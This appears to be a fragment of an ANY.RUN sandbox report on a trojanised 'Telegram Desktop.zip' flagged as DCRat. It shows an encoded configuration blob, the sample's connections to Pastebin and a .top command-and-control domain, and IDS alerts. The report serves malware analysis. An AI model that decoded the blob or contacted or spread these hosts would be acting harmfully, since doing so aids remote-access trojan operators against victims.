NdXUX5UeFR0T1EkaNhXTykFbCpmT6NmaOl2dpl0TKl2TpFVbNhmTH10MZdkW4tmeZl3Z6l1dNdlT310RPhGZq1kerpmWtJleONTVX5EMVR1Tq5kaZlmRql0cJlGVp9maJFTSEpFbOJTW5FFVNhmRU5kMJJTT6NGVPhXW65UNJ1mTyklaOhmWHpVNZRlWtpVbOhGaUpFeJNETphjaJZTSD1ENRdlTrJ1RNhXQq1UMnR1Ts50VZtGZqp1dVd0TsZ0VNhmT65keZR0TtpFROVTREp1MBRVTpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnRtNWdNpWT3lERJlnVyEmaWdUYqJUeUpkRrlkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EMFpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0ETZ2kTOyEGZzczNkBzM1QmZ4ETOlNWMzgTMxAjNmdjNiVGMwUWYzIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
unknown
1080
svchost.exe
224.0.0.252:5355
unknown
2672
ms_updater.exe
172.67.34.170:443
pastebin.com
CLOUDFLARENET
US
unknown
2672
ms_updater.exe
188.114.97.3:80
355212cm.nyashnyash.top
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.67.143
  • 104.20.68.143
shared
355212cm.nyashnyash.top
  • 188.114.97.3
  • 188.114.96.3
unknown

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2672
ms_updater.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2672
ms_updater.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Telegram Desktop.zip